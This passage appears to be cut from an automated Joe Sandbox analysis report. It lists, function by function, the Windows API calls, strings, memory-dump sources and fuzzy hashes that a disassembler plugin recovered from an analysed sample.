                                                                                                                      • _wcscmp.LIBCMT ref: 003F2269
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2280
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F2292
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00453A68), ref: 003F22B0
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F22BA
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F22C7
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F22D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                      • Opcode ID: ce3f50883fba18872b2b25942499141ec72e2cc581368f772c5a724f92366b0b
                                                                                                                      • Instruction ID: e85a03e67e2d99bcc484883b33ef2c5ad95fffd77c735d0fee5dc1def1fa9847
                                                                                                                      • Opcode Fuzzy Hash: ce3f50883fba18872b2b25942499141ec72e2cc581368f772c5a724f92366b0b
                                                                                                                      • Instruction Fuzzy Hash: C031D331A0021DBACB26EFA4DC49FEF73ACAF05321F100965E910E2190DB74DE85CB68
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove_memset
                                                                                                                      • String ID: Q\E$[$\$\$\$]$^
                                                                                                                      • API String ID: 3555123492-286096704
                                                                                                                      • Opcode ID: ecfcfd2118bfd73f582e325bfe4fd3e8e7e97bd64b4da966f8c53c2d7864c6a6
                                                                                                                      • Instruction ID: 8610f0d1984776bc345400b25c486e995cfbea4a1b731621aeb1256912388a1b
                                                                                                                      • Opcode Fuzzy Hash: ecfcfd2118bfd73f582e325bfe4fd3e8e7e97bd64b4da966f8c53c2d7864c6a6
                                                                                                                      • Instruction Fuzzy Hash: 5772D271E00219CBCF25CF98C9817ADBBB1FF45314F2981AAD855AB391D378AE81DB44
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0040ED0C
                                                                                                                      • GetFocus.USER32 ref: 0040ED1C
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0040ED27
                                                                                                                      • _memset.LIBCMT ref: 0040EE52
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 0040EE7D
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 0040EE9D
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0040EEB0
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0040EEE4
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0040EF2C
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0040EF64
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0040EF99
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3616455698-4108050209
                                                                                                                      • Opcode ID: e2d4655c5fb0481b9738a4e5615adc7a01cbb89f672374ac2261a901d81bfa57
                                                                                                                      • Instruction ID: 8841360919652cb3e40d6f8224c27d5316e2d411b97e720ff8181436cd23b404
                                                                                                                      • Opcode Fuzzy Hash: e2d4655c5fb0481b9738a4e5615adc7a01cbb89f672374ac2261a901d81bfa57
                                                                                                                      • Instruction Fuzzy Hash: 6D81AE71608302AFD720DF16C884A6BBBE4FF88354F04093EF994A7291D774D911CB9A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003DB903
                                                                                                                        • Part of subcall function 003DB8E7: GetLastError.KERNEL32(?,003DB3CB,?,?,?), ref: 003DB90D
                                                                                                                        • Part of subcall function 003DB8E7: GetProcessHeap.KERNEL32(00000008,?,?,003DB3CB,?,?,?), ref: 003DB91C
                                                                                                                        • Part of subcall function 003DB8E7: RtlAllocateHeap.NTDLL(00000000,?,003DB3CB), ref: 003DB923
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003DB93A
                                                                                                                        • Part of subcall function 003DB982: GetProcessHeap.KERNEL32(00000008,003DB3E1,00000000,00000000,?,003DB3E1,?), ref: 003DB98E
                                                                                                                        • Part of subcall function 003DB982: RtlAllocateHeap.NTDLL(00000000,?,003DB3E1), ref: 003DB995
                                                                                                                        • Part of subcall function 003DB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003DB3E1,?), ref: 003DB9A6
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003DB3FC
                                                                                                                      • _memset.LIBCMT ref: 003DB411
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003DB430
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB441
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 003DB47E
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003DB49A
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB4B7
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003DB4C6
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003DB4CD
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003DB4EE
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 003DB4F5
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003DB526
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003DB54C
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003DB560
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2347767575-0
                                                                                                                      • Opcode ID: 8c1878c7828ab73aef47cc22476d8a8944f5fa8a8fb270e8663e62d509dc344e
                                                                                                                      • Instruction ID: e5c5b318677ebc8c231264c44db1dcc2a485b26965ba4b3a68362fd943a3bde6
                                                                                                                      • Opcode Fuzzy Hash: 8c1878c7828ab73aef47cc22476d8a8944f5fa8a8fb270e8663e62d509dc344e
                                                                                                                      • Instruction Fuzzy Hash: BA515E72A00209EBDF11DFA5EC45AEEBB79FF05304F05812AE915AB261DB31DA05CB64
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                        • Part of subcall function 003E7C0C: GetFileAttributesW.KERNEL32(?,003E6A7B), ref: 003E7C0D
                                                                                                                      • _wcscat.LIBCMT ref: 003E6E7E
                                                                                                                      • __wsplitpath.LIBCMT ref: 003E6E99
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003E6EAE
                                                                                                                      • _wcscpy.LIBCMT ref: 003E6EDD
                                                                                                                      • _wcscat.LIBCMT ref: 003E6EEF
                                                                                                                      • _wcscat.LIBCMT ref: 003E6F01
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 003E6F0E
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003E6F22
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003E6F3D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2643075503-1173974218
                                                                                                                      • Opcode ID: 81bac360588ef303d633a584c57df83f04ea7494f0acc8a53bb7019fe8bd163d
                                                                                                                      • Instruction ID: 278fa8b8774e96a7192a6e7ec0cc5d4601747fd96b155d30bc28a70079bf6306
                                                                                                                      • Opcode Fuzzy Hash: 81bac360588ef303d633a584c57df83f04ea7494f0acc8a53bb7019fe8bd163d
                                                                                                                      • Instruction Fuzzy Hash: 5C21B472408384AEC212EBA0D8459DF77DC9B99354F444A1EF5D4C3082EB30D60D87A2
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: 13a03570fb31be200e5d58917955472643b0209e1bb25f70cc5c4e8fe390272b
                                                                                                                      • Instruction ID: 7caa4463ff57d0340d785a0c3a98c9495f13526fefebded47b95249c51a58689
                                                                                                                      • Opcode Fuzzy Hash: 13a03570fb31be200e5d58917955472643b0209e1bb25f70cc5c4e8fe390272b
                                                                                                                      • Instruction Fuzzy Hash: EE21C735704114AFDB22AF24DC49B6D77A8EF44710F01802AFA0ADB2A1DB70ED429B99
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB736: GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                        • Part of subcall function 003BB736: ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      • ReleaseCapture.USER32 ref: 0040EB1A
                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0040EBC2
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0040EBD5
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0040ECAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                                                                                                      • API String ID: 973565025-2104563098
                                                                                                                      • Opcode ID: d1c6629c68bb47d9abdba347044c3297fe9984edc6e6c0436c30c7b49b971334
                                                                                                                      • Instruction ID: 5fe5b1768b6c50a6970280810551f93979c4959bba32dc52ebb0ddd82218c1f8
                                                                                                                      • Opcode Fuzzy Hash: d1c6629c68bb47d9abdba347044c3297fe9984edc6e6c0436c30c7b49b971334
                                                                                                                      • Instruction Fuzzy Hash: 8651CC71204304AFD710EF24CC56FAA7BE4FB88704F004A2EF5919B2E2DB749914CB56
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003F24F6
                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003F2526
                                                                                                                      • _wcscmp.LIBCMT ref: 003F253A
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2555
                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003F25F3
                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003F2609
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                      • Opcode ID: ee72c9b33a29ca9c527e0790dcff0e2bb5a3ac7c7c9f91e33188cfd09a1af196
                                                                                                                      • Instruction ID: dbbab24c0ca0eab4bc1d7ab826ff64adda8e0b682eb1b165a5f1b8cf65a13354
                                                                                                                      • Opcode Fuzzy Hash: ee72c9b33a29ca9c527e0790dcff0e2bb5a3ac7c7c9f91e33188cfd09a1af196
                                                                                                                      • Instruction Fuzzy Hash: 1B415C7190021EEFCF16DFA4CC59AEFBBB4FF05310F20445AE919A6191E7749A54CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                      • API String ID: 0-1546025612
                                                                                                                      • Opcode ID: c978768965e501edef3c6bac7fba354fc7d36987c775ed7ff512aaf2a4f433db
                                                                                                                      • Instruction ID: 16cfd5f4326619b6628e2657a1cc8a9362eebf495dd57e85dabba3ca5a1b86c4
                                                                                                                      • Opcode Fuzzy Hash: c978768965e501edef3c6bac7fba354fc7d36987c775ed7ff512aaf2a4f433db
                                                                                                                      • Instruction Fuzzy Hash: FF92AB75E0022ACBDF25CF58D8807AEB7B1FB55314F6582ABD816AB380D7349D81CB94
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: d8171b1e559fc9246b9ea10359de56fa796d99f8605da7237e909a2f7bd04ad9
                                                                                                                      • Instruction ID: b0085948481cddcf13e7176d38b7e00e5f5f9fe2d80aef42cae5cf9665030b5e
                                                                                                                      • Opcode Fuzzy Hash: d8171b1e559fc9246b9ea10359de56fa796d99f8605da7237e909a2f7bd04ad9
                                                                                                                      • Instruction Fuzzy Hash: 54126A70A006099FDF05DFA5DA81AEEB7B5FF49300F20452AE406EB251EB36A961CB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003DBF0F
                                                                                                                        • Part of subcall function 003DBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003DBF3C
                                                                                                                        • Part of subcall function 003DBEC3: GetLastError.KERNEL32 ref: 003DBF49
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 003E830C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                      • Opcode ID: bf924fb580b42749a97a476a6b7514c25d5d71a448d2d429621f6bec5fd1fe78
                                                                                                                      • Instruction ID: 944f34475c614381c2d6103346e79869d1143a4caa11f12c308c2ed33f5d8614
                                                                                                                      • Opcode Fuzzy Hash: bf924fb580b42749a97a476a6b7514c25d5d71a448d2d429621f6bec5fd1fe78
                                                                                                                      • Instruction Fuzzy Hash: 6A01FC7DF40371ABE76A17798C4BBB7725C9B00B80F150B35F917E61D2DE50AC0181A4
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003F9235
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9244
                                                                                                                      • bind.WS2_32(00000000,?,00000010), ref: 003F9260
                                                                                                                      • listen.WS2_32(00000000,00000005), ref: 003F926F
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9289
                                                                                                                      • closesocket.WS2_32(00000000), ref: 003F929D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279440585-0
                                                                                                                      • Opcode ID: 320245bde084e6156c43c739bd28d3a908d7d634c6f036c195b84f972bd2e55e
                                                                                                                      • Instruction ID: 2a693985a758a6a771a2203048c10cea05160203cc4fcfc7dd0234ef990f01dd
                                                                                                                      • Opcode Fuzzy Hash: 320245bde084e6156c43c739bd28d3a908d7d634c6f036c195b84f972bd2e55e
                                                                                                                      • Instruction Fuzzy Hash: E621D831600608AFCB11EF64CC85B7EB7A9EF85314F11455AFA56AB3D1C734AD41CB51
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: hNE$tME
                                                                                                                      • API String ID: 4104443479-3216842091
                                                                                                                      • Opcode ID: 03547a852255a09a8ef46b8adb58e925d6efc07378c412c9d7d22cd0b7b7a9f4
                                                                                                                      • Instruction ID: a1d4ebe1a84e00ea8af28c282b89ceb2fa65ec91678e8e897ce223008e26cffc
                                                                                                                      • Opcode Fuzzy Hash: 03547a852255a09a8ef46b8adb58e925d6efc07378c412c9d7d22cd0b7b7a9f4
                                                                                                                      • Instruction Fuzzy Hash: 0FA2BEB4E00219CFCB25CF58C9806ADBBB5FF49314F6981AAD819AB390D7789D81CF54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
